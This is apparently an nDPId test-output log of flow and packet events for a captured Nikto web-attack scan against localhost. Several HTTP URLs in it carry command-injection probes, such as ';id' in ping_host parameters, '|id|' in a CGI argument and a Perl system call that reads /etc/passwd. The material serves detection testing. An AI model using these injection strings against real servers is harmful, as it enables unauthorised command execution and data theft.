00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="}
01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01120{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="}
